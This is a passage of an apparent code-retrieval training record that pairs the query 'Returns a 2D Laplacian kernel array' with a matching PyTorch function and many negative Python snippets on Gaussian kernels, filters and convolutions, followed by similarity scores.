weight.sum()\n return weight", "def fake_gaussian(img, vertical_horizontal_sigma, iter=3):\n sigma_vertical, sigma_horizontal = vertical_horizontal_sigma\n h_blured = box_filter1d(img, sigma_horizontal, horizontal=True, iter=iter)\n blured = box_filter1d(h_blured, sigma_vertical, horizontal=False, iter=iter)\n return blured", "def Gaussian(x,t,sigma):\n return np.exp(-(x-t)**2/(2*sigma**2))", "def compute_kernel_matrix(x,y,sigma):\n m = len(x)\n\n s = np.zeros((m,m))\n for i in range(len(x)):\n for j in range(i+1):\n s[i,j] = np.exp(-((x[i]-y[j])**2)/(2*sigma**2))\n for i in range(2,m):\n for j in range(0,i):\n s[i,j] = s[j,i]\n return s", "def create_gaussian_array(self):\n\n # Fill array of size l x w with Gaussian Noise.\n terrain_length = int(ceil(self.length/self.resolution))\n terrain_width = int(ceil(self.width/self.resolution))\n gaussian_array = np.random.normal(self.mu, self.sigma, (terrain_length,terrain_width))\n\n # Filter the array to smoothen the variation of the noise\n gaussian_array = gaussian_filter(gaussian_array, self.sigma_filter)\n\n return gaussian_array", "def get_filter(omega_x: float, omega_y: float, omega_z: float,\n omega: np.ndarray) -> np.ndarray:\n\n # A 3D Gaussian is the product of three 1D Gaussians.\n variance = 2.5\n c = 1 / (2 * variance) # 0.2\n filter_x = np.exp(-c*np.power(omega-omega_x, 2))\n filter_y = np.exp(-c*np.power(omega-omega_y, 2))\n filter_z = np.exp(-c*np.power(omega-omega_z, 2))\n filter_3d = np.multiply.outer(np.multiply.outer(filter_x, filter_y), \n filter_z)\n\n return filter_3d", "def GaussianKernel(sigma: float = 1., width: int = 0):\n assert not ((width is None or width == 0) and\n (sigma is None or sigma == 0)), \\\n \"GaussianKernel :: both sigma ({}) & width ({}) are not valid\".format(\n sigma, width)\n\n if width is None or width == 0:\n width = int(2.0 * 3.0 * sigma + 1.0)\n if width % 2 == 0:\n width += 1\n\n if sigma is None or sigma == 0:\n sigma = (width - 1)/6.\n half = width//2\n x, y = np.meshgrid(np.linspace(-half, half, width),\n np.linspace(-half, half, width), indexing='xy')\n w = np.exp(- (x**2 + y**2) / (2.*(sigma**2)))\n w /= np.sum(w)\n return torch.from_numpy(w.astype(np.float32)).view(1, 1, width, width)", "def cov_matrix(X, mu):\n m, n = X.shape\n X_minus_mu = X - mu\n sigma = (1 / m) * (X_minus_mu.T).dot(X_minus_mu)\n\n return sigma", "def cheby_coeff2(m,s):\r\n c = np.zeros(m+1)\r\n for j in range(m+1):\r\n c[j] = 2*np.exp(-s)*j1(-s)\r\n \r\n return c", "def fmgf(array, sigma):\n x, y = np.arange(len(array)), array.copy()\n yg = ndimage.filters.gaussian_filter(y, sigma)\n y -= yg\n\n # digitizing\n m = 101\n dy = 6.0 * mad(y) / m\n ybin = np.arange(np.min(y) - 5 * dy, np.max(y) + 5 * dy + dy, dy)\n z = np.zeros([len(ybin), len(x)])\n z[np.digitize(y, ybin), x] = 1.0\n\n # filtering\n g = partial(ndimage.filters.gaussian_filter, sigma=(0, sigma))\n c = partial(ndimage.filters.convolve1d, weights=np.ones(m), axis=0)\n zf = c(c(c(g(z))))\n\n # estimates\n ym1, y0, yp1 = [ybin[np.argmax(zf, 0) + i] for i in (-1, 0, 1)]\n zm1, z0, zp1 = [zf[np.argmax(zf, 0) + i, x] for i in (-1, 0, 1)]\n t = (zm1 - z0) / (zm1 - 2 * z0 + zp1)\n\n filtered = yg + ((1 - t) ** 2) * ym1 + (2 * t * (1 - t)) * y0 + (t**2) * yp1\n return filtered", "def gaussian3d(l, sigma=1.0):\n\n ax = np.arange(-l//2 + 1.0, l//2 + 1.0)\n xx, yy, zz = np.meshgrid(ax, ax, ax)\n\n kernel = np.exp(-(xx**2 + yy**2 + zz**2)/(2.0*sigma**2))\n\n return np.asarray(kernel, dtype=np.float32)", "def gaussian(x, x0=0.0, fwhm=1.0, ampl=1.0):\n return ampl * np.exp(-4 * np.log(2) * ((x - x0) / fwhm) ** 2)", "def gaussian_black(z, mu: 'normal' = 0, sigma: (0.4,1) = 0.7):\n return 1/(np.sqrt(2*np.pi)*sigma)*np.exp(-np.power((z - mu)/sigma, 2)/2)", "def func_gaussian(self, dmv, vpar):\n dmoff = dmv - vpar[0]\n sig = vpar[1]\n sig = sig * sig\n return np.exp(-0.5 * dmoff * dmoff / sig) * self.ThetaFunc(dmv)", "def MVgaussian(size,mu1=0,mu2=0, sigma1=3,sigma2 = 1):\n kernel = np.zeros((size, size), dtype=np.float32)\n \n size = int(size) // 2\n X = np.arange(-size,size+1)\n Y = np.arange(-size,size+1)\n \n for x in X:\n for y in Y:\n Gx = np.exp(-((x-mu1)**2)/(2*(sigma1**2)))\n Gy = np.exp(-((y-mu2)**2)/(2*(sigma2**2)))\n Gx = math.exp(-(math.pow(x-mu1,2))/(2*math.pow(sigma1,2)))\n Gy = math.exp(-(math.pow(y-mu2,2))/(2*math.pow(sigma2,2)))\n kernel[x+size,y+size] = Gx*Gy\n return kernel", "def gaussian(x, sigma):\n try: r = np.exp(-0.5*(x/sigma)**2) \n except: r = np.zeros(len(x))\n return r", "def get_square_gauss(x_mat):\n sq_mat = np.zeros(x_mat['mu'].shape)\n\n for i in range(x_mat['mu'].shape[1]):\n sq_mat[:, i] = x_mat['mu'][:, i] ** 2.0\n sq_mat[:, i] += np.diag(x_mat['sigma'][i, :, :])\n\n return sq_mat", "def gaussianFilter3D(size, points):\n \n matrix = numpy.zeros((size, size, size))\n \n for point in points:\n x0 = point[0]\n y0 = point[1]\n z0 = point[2]\n x2SigmaSquared = pow(point[3] * size/4, 2) * 2\n y2SigmaSquared = pow(point[4] * size/4, 2) * 2\n z2SigmaSquared = pow(point[5] * size/4, 2) * 2\n tempMatrix = numpy.zeros((size, size, size))\n for x in range(0, size):\n for y in range(0, size):\n for z in range(0, size):\n tempMatrix[y, x, z] = math.exp(-1 * \\\n (math.pow(x-x0, 2)/x2SigmaSquared +\\\n math.pow(y-y0, 2)/y2SigmaSquared +\\\n math.pow(z-z0, 2)/z2SigmaSquared))\n \n matrix = numpy.add(matrix, tempMatrix)\n \n matrix = matrixfix.flatten(matrix, 0, 1)\n \n return matrix", "def fit_gaussian(array):\n\n shape = array.shape\n xmean, ymean = numpy.array(shape) / 2.\n\n xx, yy = numpy.mgrid[:shape[0], :shape[1]]\n\n g_init = astropy.modeling.models.Gaussian2D(amplitude=1., x_mean=xmean, y_mean=ymean,\n x_stddev=1., y_stddev=1.)\n\n f2 = astropy.modeling.fitting.LevMarLSQFitter()\n\n gg = f2(g_init, xx, yy, array)\n\n return gg", "def forward(self, xs, like_params, nan_mask=None):\n\t\tassert len(like_params) == 1, f\"SphericalGaussianLikelihood only takes\"\\\n\t\t\t\t+ f\" a single parameter. Found {len(like_params)}.\"\n\t\t# Unwrap the single parameter tuple.\n\t\tlike_params = like_params[0] # [b,s,m,m_dim]\n\t\tassert len(like_params.shape) == 4\n\t\txs = xs.unsqueeze(1) # [b,1,m,m_dim]\n\t\t# Make a Gaussian distribution.\n\t\tdist = Normal(\n\t\t\t\ttorch.zeros(1, device=xs.device),\n\t\t\t\tself.std_dev*torch.ones(1, device=xs.device),\n\t\t)\n\t\tlog_probs = xs - like_params # [b,s,m,m_dim]\n\t\tlog_probs = dist.log_prob(log_probs).sum(dim=3) # [b,s,m]\n\t\tif nan_mask is not None:\n\t\t\ttemp_mask = (~nan_mask).float().unsqueeze(1).expand(log_probs.shape)\n\t\t\tassert temp_mask.shape == log_probs.shape, \\\n\t\t\t\t\tf\"{temp_mask.shape} != {log_probs.shape}\"\n\t\t\tlog_probs = log_probs * temp_mask # [b,s,m]\n\t\treturn log_probs", "def multivariate_gaussian(pos, mu, Sigma):\r\n\r\n n = mu.shape[0]\r\n Sigma_det = np.linalg.det(Sigma)\r\n Sigma_inv = np.linalg.inv(Sigma)\r\n N = np.sqrt((2*np.pi)**n * Sigma_det)\r\n # This einsum call calculates (x-mu)T.Sigma-1.(x-mu) in a vectorized\r\n # way across all the input variables.\r\n fac = np.einsum('...k,kl,...l->...', pos-mu, Sigma_inv, pos-mu)\r\n\r\n return np.exp(-fac / 2) / N", "def fitgaussian(data):\n params = moments(data)\n errorfunction = lambda p: np.ravel(gaussian(*p)(*np.indices(data.shape)) -\n data)\n p, success = leastsq(errorfunction, params)\n return p", "def scipy_smooth(img, sigma=5):\n return ndimage.gaussian_filter(img, sigma=sigma)", "def g(x):\n return 5. - x[:, 1] - .5 * x[:, 0] ** 2.", "def fitgaussian(data):\n params = moments(data)\n errorfunction = lambda p: np.ravel(gaussian(*p)(*np.indices(data.shape)) -\n data)\n p, success = optimize.leastsq(errorfunction, params)\n return p", "def fitgaussian(data):\n params = moments(data)\n errorfunction = lambda p: np.ravel(gaussian(*p)(*np.indices(data.shape)) -\n data)\n p, success = optimize.leastsq(errorfunction, params)\n return p", "def filter_to_matrix(data):\n spectrogram_shape = data[0].shape\n fit_data = np.zeros(shape=(len(data), spectrogram_shape[0], spectrogram_shape[1]))\n for i in range(len(data)):\n # filtered_spectrogram = apply_thresholding(gaussian_filter(data[i]))\n filtered_spectrogram = gaussian_filter(data[i])\n for j in range(filtered_spectrogram.shape[0]):\n for k in range(filtered_spectrogram.shape[1]):\n fit_data[i][j][k] = filtered_spectrogram[j][k]\n return fit_data", "def gaussion_smoothing(self,sigma=None):\n print(\"## Gaussian smoothing...\");\n corr_length = self.corr_length\n if sigma is None:\n corr = self.correlation\n oscillation=np.max(np.abs(corr[:-1]-corr[1:]),axis=0)\n peak=np.max(np.abs(corr),axis=0)\n oscillation /= peak\n sigma= corr_length/(5.0*oscillation*len(corr)*self.smooth_tune) # 15.0 has been tuned for many times \n print \"sigma:\"\n print sigma\n for i in np.arange(corr_length):\n self.correlation[i] *= exp(-i*i/(2*sigma*sigma))/(sigma*sqrt(2*pi))", "def create_model() -> sklearn.mixture.GaussianMixture:\n logger.info(\"Creating Gaussian Mixture model\")\n logger.debug(\n f\"Model: GaussianMixture, n_components={data.N_CENTERS}, \"\n + f\"covariance_type={COVARIANCE_TYPE}, n_init={N_INIT}, \"\n + f\"init_params={INIT_PARAMS}\"\n )\n return GaussianMixture(\n n_components=data.N_CENTERS,\n covariance_type=COVARIANCE_TYPE,\n n_init=N_INIT,\n init_params=INIT_PARAMS,\n )", "def estimate_uni_gaussian(X):\n mu = mean(X, axis=0)\n sigma2 = var(X, axis=0)\n return mu, sigma2", "def Gaussian_conv(n):\n\n\t# Choose sigma and mu\n\tsigma = 1\n\tmu = 0\n\n\t# Create table\n\tb = sigma * np.random.randn(n) + mu\n\tsum = b.sum()\n\t#b = b/sum\n\tprint(b)\n\treturn b", "def gaussianFilter(gain,BT,spSym,nTaps):\n\n a = np.sqrt(np.log(2)/2)/BT\n t = np.linspace(-.5*nTaps,.5*nTaps-1,nTaps)/spSym\n\n ft = np.sqrt(np.pi)/a *np.exp(-(np.pi**2*(t)**2)/a**2)\n ft /= np.sum(ft) * gain # normalize filter\n\n return ft", "def gaussian_filter(shape=(3,3),sigma=0.5):\n m,n = [(ss-1.)/2. for ss in shape]\n y,x = np.ogrid[-m:m+1,-n:n+1]\n h = np.exp( -(x*x + y*y) / (2.*sigma*sigma))\n h[ h < np.finfo(h.dtype).eps*h.max() ] = 0\n sumh = h.sum()\n if sumh != 0:\n h /= sumh\n return h", "def __bivariate_gaussian(self, sig1, sig2, mu1, mu2, x1, x2, rho):\n Z1 = ((x1 - mu1) / sig1) ** 2\n Z2 = ((x2 - mu2) / sig2) ** 2\n Z3 = 2 * rho * (x1 - mu1) * (x2 - mu2) / (sig1 * sig2)\n Z = Z1 + Z2 - Z3\n\n pi_const = torch.tensor([np.pi]).to(self.__device)\n\n return torch.exp(-Z / (2 * (1 - rho ** 2))).to(self.__device) / (\n 2 * pi_const * sig1 * sig2 * torch.sqrt(1 - rho ** 2)\n )", "def __bivariate_gaussian(self, sig1, sig2, mu1, mu2, x1, x2, rho):\n Z1 = ((x1 - mu1) / sig1) ** 2\n Z2 = ((x2 - mu2) / sig2) ** 2\n Z3 = 2 * rho * (x1 - mu1) * (x2 - mu2) / (sig1 * sig2)\n\n Z = Z1 + Z2 - Z3\n\n pi_const = torch.tensor([np.pi]).to(self.__device)\n\n return torch.exp(-Z / (2 * (1 - rho ** 2))).to(self.__device) / (\n 2 * pi_const * sig1 * sig2 * torch.sqrt(1 - rho ** 2)\n )", "def gaussian(amp, fwhm, mean, x):\n return amp * np.exp(-4. * np.log(2) * (x-mean)**2 / fwhm**2)", "def gaussian_white(z, mu: 'normal' = 0, sigma: (0.4, 1) = 0.7):\n return 1 - gaussian_black(z, mu, sigma)", "def model_gauss(xsigma, nx, ny=1, nz=1, ysigma=None, zsigma=None, xcenter=None, ycenter=None, zcenter=None):\n\te = EMData()\n\te.set_size(nx, ny, nz)\n\tif( ysigma == None ) : ysigma = xsigma\n\tif( zsigma == None ) : zsigma = xsigma\n\tif( xcenter == None ) : xcenter = nx//2\n\tif( ycenter == None ) : ycenter = ny//2\n\tif( zcenter == None ) : zcenter = nz//2\n\te.process_inplace(\"testimage.puregaussian\", {\"x_sigma\":xsigma,\"y_sigma\":ysigma,\"z_sigma\":zsigma,\"x_center\":xcenter,\"y_center\":ycenter,\"z_center\":zcenter} )\n\treturn e", "def isotropic_Gaussian(ksize=15, l=6):\n\n V = np.array([[1, 0], [0, -1]])\n D = np.array([[l, 0], [0, l]])\n Sigma = np.dot(np.dot(V, D), np.linalg.inv(V))\n k = gm_blur_kernel(mean=[0, 0], cov=Sigma, size=ksize)\n\n return k", "def gaussian_kernel(size, sigma):\n\n kernel = np.zeros((size, size))\n\n ### YOUR CODE HERE\n k = (size-1)/2\n factor = 1/(2*np.pi*sigma**2)\n for i in range(size):\n for j in range(size):\n exponent = -((i-k)**2 +(j-k)**2)/(2*sigma**2)\n kernel[i,j] = factor*np.exp(exponent)\n ### END YOUR CODE\n\n return kernel", "def get_gaussian(nsig=1.5, kernlen=13):\n\n interval = (2*nsig+1.)/(kernlen)\n x = np.linspace(-nsig-interval/2., nsig+interval/2., kernlen+1)\n kern1d = np.diff(st.norm.cdf(x))\n kernel_raw = np.sqrt(np.outer(kern1d, kern1d))\n kernel = kernel_raw/kernel_raw.sum()\n return theano.shared(kernel.astype(\"float32\"), borrow=True)", "def get_transform_matrix(gamma, a, epsilon=1e-8):\n return (np.diag(1.0 / (a + epsilon)) @ gamma).T", "def coefficients(self):\r\n return self.coef_['x']", "def gaussian_blur(self, img):\n kernel_size = self.gaussian_blur_params[\"kernel_size\"]\n return cv2.GaussianBlur(img, (kernel_size, kernel_size), 0)", "def Gaussian(x, t, sigma):\n return np.exp(-(x - t)**2 / (2 * sigma**2))", "def fitgaussian(data):\n params = moments(data)\n errorfunction = lambda p: ravel(gaussian(*p)(*indices(data.shape)) -\n data)\n p, success = optimize.leastsq(errorfunction, params)\n return p", "def transform(self,G):\n\n n = len(self.G_train_)\n nt = len(G)\n #Ks = sp.zeros((n,1))\n kernel_matrix = sp.zeros((nt,n))\n \n# for j in range(n):\n# Ks[j] = sp.sqrt(aGMKernel(self.G_train_[j],self.G_train_[j],self.alpha,self.gamma))\n# \n# for i in range(nt):\n# Kts = sp.sqrt(aGMKernel(G[i],G[i],self.alpha,self.gamma))\n# for j in range(n):\n# kernel_matrix[i,j] = aGMKernel(G[i],self.G_train_[j],self.alpha,self.gamma)/Kts/Ks[j]\n \n for i in range (nt):\n for j in range(n):\n kernel_matrix[i,j] = aGMKernel(G[i],self.G_train_[j],self.alpha, self.gamma)\n \n \n return kernel_matrix", "def gaussian(x, mean, sigma):\n return np.exp(-np.square(x-mean)/(2*np.square(sigma))) / (np.sqrt(2*np.pi*sigma**2))", "def gauss_smooth(data, sigma):\n\t\t\t# make the kernel 5 sigmas wide in each direction\n\t\t\tkernel = stats.norm.pdf(np.arange(-5*sigma, (5*sigma)+1), scale=sigma)\n\t\t\t\n\t\t\treturn sp.ndimage.convolve1d(data, kernel, axis=2)", "def gaussian(x, *parameters):\n position, sigma, amplitude, background = parameters\n return amplitude * np.exp(-(x - position)**2 / (2.0 * sigma**2)) + background", "def get_features_critic(state):\n # reshape to make it a matrix with one row (so we can transpose it later)\n p, v = state\n p_v = np.array([p, v]).reshape((1, -1)).T\n X = np.array([p_v - c_entry.T for c_entry in C])\n inv_cov = np.linalg.inv(np.diag([0.04, 0.0004]))\n phi = np.array([np.exp(-(xi.T @ inv_cov @ xi) / 2) for xi in X])\n\n return np.squeeze(phi) # get rid of 2 unnecessary dimensions", "def FV_GMM(xx, gmm):\n \n # Attributes of the GMM.\n means = gmm.means_ # Shape: (K, d)\n covar = gmm.covariances_ # Shape: (K, d)\n weights = gmm.weights_ # Shape: (K, )\n n_comps = gmm.n_components # Integer scalar\n \n # Encoded document.\n xx = np.atleast_2d(xx) # Shape: (T, d) \n T = xx.shape[0] # Doc. length\n d = xx.shape[1] # Dimensionality of word/feat. vectors\n \n # Array to store the result.\n out = np.zeros((n_comps, d), dtype=np.float32) # Shape: (K, d)\n \n # Posterior probabilities.\n probs = gmm.predict_proba(xx) # Shape: (T, K)\n \n # Soft assignment of a document `xx` to k-th Gaussian. \n probs_sum = np.sum(probs, 0)[:, np.newaxis] # Shape: (K, 1)\n \n # Vectorization of the sum over t of `gamma_t(i)*x_t`.\n probs_xx = np.dot(probs.T, xx) # Shape: (K, d)\n \n # Derivatives with respect to the means.\n d_mean = probs_xx - means * probs_sum # Shape: (K, d)\n \n # Normalization.\n eps = 1e-6 # Avoids dividing by 0\n np.divide(d_mean, np.sqrt(covar), out=d_mean)\n \n out = d_mean / (np.sqrt(weights.reshape((n_comps, 1)) + eps))\n \n return out.flatten()", "def fspecial_gaussian(shape=(3, 3), sigma=0.5):\n m, n = [(ss - 1.) / 2. for ss in shape]\n y, x = np.ogrid[-m:m + 1, -n:n + 1]\n h = np.exp(-(x * x + y * y) / (2. * sigma * sigma))\n h[h < np.finfo(h.dtype).eps * h.max()] = 0\n sumh = h.sum()\n if sumh != 0:\n h /= sumh\n return h", "def gamma_matrix(gamma_coefs):\n matrix = np.ndarray([len(gamma_coefs), 3, 256], dtype=int)\n\n # gamma_coefs contains an [R, G, B] gamma table for each slab\n for i, slab in enumerate(gamma_coefs):\n for j, color in enumerate(slab):\n for k in range(256):\n v = pow(k / 255, color) * 255\n v = int(round(v))\n matrix[i, j, k] = v\n return matrix", "def __gaussian_blur(self, img, kernel_size=3):\n return cv2.GaussianBlur(img, (kernel_size, kernel_size), 0)", "def gaussianblur_transform(im):\n im_gblur = cv2.GaussianBlur(im,(5,5),0)\n return im_gblur" ]
[ "0.64841884", "0.6266498", "0.6249518", "0.59057564", "0.5897109", "0.5803587", "0.57633173", "0.5752097", "0.56212413", "0.56012994", "0.5532037", "0.5527262", "0.55129933", "0.55118227", "0.5507921", "0.54987395", "0.5487615", "0.54819536", "0.54755914", "0.5475295", "0.5471288", "0.5470004", "0.546501", "0.54598325", "0.54492927", "0.5445654", "0.5442235", "0.5435253", "0.54186183", "0.54112786", "0.54024386", "0.5385494", "0.5378067", "0.53775054", "0.53758305", "0.5361536", "0.5356859", "0.53510606", "0.5323843", "0.5305672", "0.5292315", "0.5283903", "0.5277511", "0.5257358", "0.5242478", "0.52404267", "0.52359545", "0.52271885", "0.52219534", "0.52112216", "0.5207602", "0.52034044", "0.5198882", "0.51910347", "0.51863766", "0.5175186", "0.5170019", "0.51673156", "0.5167194", "0.51626396", "0.5155137", "0.5151069", "0.51503223", "0.514882", "0.5140108", "0.5134104", "0.51338124", "0.51316553", "0.5128646", "0.51211923", "0.51211923", "0.51181245", "0.5117667", "0.51170075", "0.51147175", "0.511074", "0.5109472", "0.51056063", "0.5105427", "0.51011795", "0.510077", "0.50940436", "0.509369", "0.50872564", "0.5082928", "0.5078514", "0.5073507", "0.50702757", "0.50688833", "0.506701", "0.50658196", "0.505914", "0.50540686", "0.5039263", "0.503673", "0.5031028", "0.50261253", "0.50145334", "0.5013562", "0.5010401", "0.50089175" ]
0.0
-1
Returns a 2D Laplacian kernel array.
def get_laplacian_kernel(kernel_size) -> torch.Tensor: kernel: torch.Tensor = get_laplacian_kernel2d(kernel_size) return kernel
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_laplacian_kernel2d(kernel_size: int) -> torch.Tensor:\n if not isinstance(kernel_size, int) or kernel_size % 2 == 0 or \\\n kernel_size <= 0:\n raise TypeError(\"ksize must be an odd positive integer. Got {}\"\n .format(kernel_size))\n\n kernel = torch.ones((kernel_size, kernel_size))\n mid = kernel_size // 2\n kernel[mid, mid] = 1 - kernel_size ** 2\n kernel_2d: torch.Tensor = kernel\n return kernel_2d", "def get_laplacian_kernel(kernel_size: int) -> torch.Tensor:\n if not isinstance(kernel_size, int) or kernel_size % 2 == 0 or \\\n kernel_size <= 0:\n raise TypeError(\"ksize must be an odd positive integer. Got {}\"\n .format(kernel_size))\n window_1d: torch.Tensor = laplacian_1d(kernel_size)\n return window_1d", "def conv2D(inImage: np.ndarray, kernel2: np.ndarray) -> np.ndarray:\r\n flip_kernel = np.flipud(np.fliplr(kernel2))\r\n kernel_row = flip_kernel.shape[0]\r\n kernel_col = flip_kernel.shape[1]\r\n\r\n new_img = np.zeros_like(inImage)\r\n padded_img = padded_replicate(inImage, kernel_row, kernel_col)\r\n\r\n for x in range(inImage.shape[0]):\r\n for y in range(inImage.shape[1]):\r\n new_img[x, y] = (padded_img[x: x + kernel_col, y: y + kernel_row] * flip_kernel).sum()\r\n if flip_kernel.sum() != 0:\r\n new_img[x, y] /= flip_kernel.sum()\r\n\r\n return new_img", "def generate_2D(X):\n\n\tno_of_images = len(X)\n\tdata = np.zeros((no_of_images, 28, 28))\n\n\tfor i in xrange(no_of_images):\n\t\tdata[i] = np.copy(X[i].reshape(28, 28))\n\n\treturn data", "def getLongArray2D(self) -> typing.List[typing.List[int]]:\n ...", "def getArray2d(self):\n\t\treturn self.array2d", "def _convolve_2d(kernel, image):\n\n nx = image.shape[0]\n ny = image.shape[1]\n nkx = kernel.shape[0]\n nky = kernel.shape[1]\n wkx = nkx // 2\n wky = nky // 2\n\n result = np.zeros(image.shape, dtype=float32)\n\n for i in prange(0, nx, 1):\n iimin = max(i - wkx, 0)\n iimax = min(i + wkx + 1, nx)\n for j in prange(0, ny, 1):\n jjmin = max(j - wky, 0)\n jjmax = min(j + wky + 1, ny)\n num = 0.0\n for ii in range(iimin, iimax, 1):\n iii = wkx + ii - i\n for jj in range(jjmin, jjmax, 1):\n jjj = wky + jj - j\n num += kernel[iii, jjj] * image[ii, jj]\n result[i, j] = num\n\n return result", "def convolution_2d(img, kernel):\n # TODO write convolution of arbritrary sized convolution here\n # Hint: you need the kernelsize\n\n offset = int(kernel.shape[0] / 2)\n irows, icols = img.shape\n newimg = np.zeros((irows - offset, icols - offset, offset * 2 + 1, offset * 2 + 1))\n nrows, ncols, _, _ = newimg.shape\n for x in range(nrows - 1):\n for y in range(ncols - 1):\n newimg[x, y, :, :] = img[x:x + offset * 2 + 1, y:y + offset * 2 + 1]\n newimg *= kernel\n\n newimg = np.sum(newimg, axis=3)\n newimg = np.sum(newimg, axis=2)\n\n return newimg", "def convolve_spikes_2d(spikes_a,spikes_b,kernel_a,kernel_b):\n output = np.zeros((spikes_a.shape[0]+kernel_a.shape[0],kernel_a.shape[1]*kernel_b.shape[1]))\n for k_i in range(kernel_a.shape[1]):\n for k_j in range(kernel_b.shape[1]):\n mat = np.zeros((kernel_a.shape[0],kernel_b.shape[0]))\n #for l_1 in range(kernel_a.shape[0]):\n # for l_2 in range(kernel_b.shape[0]):\n # mat[l_1,l_2] = kernel_a[l_1,k_i] * kernel_b[l_2,k_j]\n for i in np.where(spikes_a)[0]:\n for j in np.where(spikes_b[(i+1):(i+1+kernel_b.shape[0])])[0]:\n if j < kernel_b.shape[0]:\n output[(i+j):(i+j+kernel_a.shape[0]),k_i * kernel_b.shape[1] + k_j] = output[(i+j):(i+j+kernel_a.shape[0]),k_i * kernel_b.shape[1] + k_j] + kernel_a[:,k_i] * kernel_b[j,k_j] #mat[:,j-i]\n return output[:spikes_a.shape[0],:]", "def laplacian(src: torch.Tensor, kernel_size: int) -> torch.Tensor:\n return Laplacian(kernel_size)(src)", "def _get_n2(self) -> np.ndarray:\n if self.nstep is None:\n n2_disp1d = np.arange(-self.N // 2 + 1, self.N // 2 + 1) ** 2\n else:\n p1d = np.arange(self.N) * 2 * np.pi / self.L\n\n coeffs = get_laplace_coefficients(self.nstep)\n norm = self.L ** 2 / self.epsilon ** 2 / 4 / np.pi ** 2\n\n n2_disp1d = np.sum(\n [\n -cn * np.cos(n * p1d * self.epsilon) * norm\n for n, cn in coeffs.items()\n ],\n axis=0,\n )\n\n return np.sum(\n [el.flatten() for el in np.meshgrid(*[n2_disp1d] * self._ndim)], axis=0\n )", "def two_dim(a: cython.double[:,:]):\n a[0,0] *= 3\n return a[0,0], a[0,1], a.ndim", "def L2_func(x):\n return K.expand_dims(K.sqrt(K.sum(K.pow(x,2), axis=1)))", "def convolution2D(ndarray, kernel, kernel_pivot):\n\t#validation of arrays types\n\tassert ndarray.dtype == np.float, 'Invalid dtype of ndarray should be float'\n\tassert kernel.dtype == np.float, 'Invalid dtype of kernel should be float'\n\tassert ndarray.ndim == 2, 'Invalid ndarray dimension'\n\tassert kernel.ndim == 2, 'Invalid kernel dimension'\n\t#check if the kernel_pivot is valid\n\theight_kernel, width_kernel = kernel.shape\n\tx_pivot, y_pivot = kernel_pivot\n\n\tif not (x_pivot >= 0 and x_pivot < width_kernel) and (y_pivot >= 0 and y_pivot < height_kernel):\n\n\t\tassert False, 'Invalid pivot coordinates'\n\n\tflatten_kernel = kernel.flatten()\n\n\t#create new ndarray object for store the result\n\tresult_ndarray = np.zeros(ndarray.shape, dtype = float)\n\n\t#get the actual shape for \n\theight, width = ndarray.shape\n\t\n\t#calculate kernel bounds\n\tx_min, x_max = (x_pivot), ((width_kernel-1) - x_pivot)\n\ty_min, y_max = (y_pivot), ((height_kernel-1) - y_pivot)\n\n\t#change the bounds of my array with concatenate fuctions\n\tleft, right, up, down = x_min, x_max, y_min, y_max\n\tndarray = expand_img(ndarray, left, right, up, down)\n\n\tx_init, x_end = x_min, x_min + width\n\ty_init, y_end = y_min, y_min + height\n\t#loops for access to ndarrays\n\tfor x in range(x_init, x_end ):\n\t\tfor y in range(y_init, y_end ):\n\t\t\t#get the data of original image\n\t\t\tponderate_values = ndarray[(y - y_min):(y + y_max + 1) , # y range to indexed\n\t\t\t\t\t\t\t\t\t (x - x_min):(x + x_max) + 1] # x range to indexed\n\t\t\tponderate_values = ponderate_values.flatten()\n\n\t\t\t#get the dot product for the ponderate sum\n\t\t\tresult_ndarray[x - x_init, y - y_init] = np.dot(ponderate_values, flatten_kernel) \n\n\treturn result_ndarray", "def LEIsotropic2D(self):\n const = self.ymod / ((1+self.Nu) * (1-(2*self.Nu)))\n a = const * self.Nu\n b = const * (1-self.Nu)\n c = const * 0.5 * (1-2*self.Nu)\n Cmat = np.array(\n [\n [b, a, 0],\n [a, b, 0],\n [0, 0, c],\n ], dtype=float)\n stress_el = Cmat @ self.eps\n return stress_el, Cmat", "def get_l(GW_glitch,i,j):\n\t\t \n\ttemp = np.einsum('nmk,nmk->k', GW_glitch.r_outer_r[:,:,i,j,:], GW_glitch.Hij[:,:,i,j,:])\n\t\t \n\treturn temp", "def get_kernel(X1, X2, charges1, charges2, sigma=1, mode=\"local\"):\n\n if len(X1.shape) > 2:\n\n K = get_atomic_local_kernel(X1, X2, charges1, charges2, sigma)\n\n else:\n\n K = laplacian_kernel(X2, X1, sigma)\n\n return K", "def compute_kernel_matrix(x,y,sigma):\n m = len(x)\n\n s = np.zeros((m,m))\n for i in range(len(x)):\n for j in range(i+1):\n s[i,j] = np.exp(-((x[i]-y[j])**2)/(2*sigma**2))\n for i in range(2,m):\n for j in range(0,i):\n s[i,j] = s[j,i]\n return s", "def convolve2d(img, kernel):\n #Flip the kernel\n kernel = utils.flip2d(kernel) \n #print(len(kernel))\n \n c = copy.deepcopy(img)\n \n #print(len(c))\n #Padd the image\n pad = int((len(kernel)-1)/2)\n\n\n padded_img = utils.zero_pad(img,pad,pad)\n #print(len(padded_img), len(padded_img[0]))\n #print(len(kernel))\n #print(len(img)**2)\n og_img=[]\n#c = copy.deepcopy(img)\n j=0\n offset = 0\n for m in range(len(img) * len(img[0])): # size of kernel x kernel\n x = []\n \n for i in range(len(kernel)): #3 is kernel size\n #print(i,j)\n x.append(padded_img[i+offset][j:j+len(kernel)])\n #print((x))\n sum = 0\n for k in range(len(kernel)):\n for l in range(len(kernel[0])):\n sum+= x[k][l] * kernel[k][l]\n #print(i,j)\n #print(sum)\n og_img.append(sum) \n j+=1\n if (j == len(img[0])):\n j = 0\n offset+= 1\n \n #print(len(img), len(img[0]))\n final_img = []\n for i in range(0,(len(img)*len(img[0])),len(img[0])):\n final_img.append(og_img[i:i+len(img[0])])\n #print(len(final_img)), len(final_img[0])\n return final_img\n\n # TODO: implement this function.", "def conv2d(args):\n inp_ = args[0]\n kernel = args[1]\n stride = args[2]\n padding = args[3]\n (batch_size, in_channels, H, W) = inp_.shape\n (out_channels, in_channels_t, Hk, Wk) = kernel.shape\n Hc = int((H - Hk)/stride)+1\n Wc = int((W - Wk)/stride)+1\n conv_layer = np.zeros((batch_size, out_channels, Hc, Wc))\n for batch_i in range(batch_size):\n for o_chann_i in range(out_channels):\n for in_chann_i in range(in_channels):\n curr_ker = kernel[o_chann_i, in_chann_i, :, :]\n curr_inp = inp_[batch_i, in_chann_i, :, :]\n h_ind = 0\n while h_ind + Hk <= H:\n w_ind = 0\n while w_ind + Wk <= W:\n inp_patch = curr_inp[h_ind:h_ind+Hk, 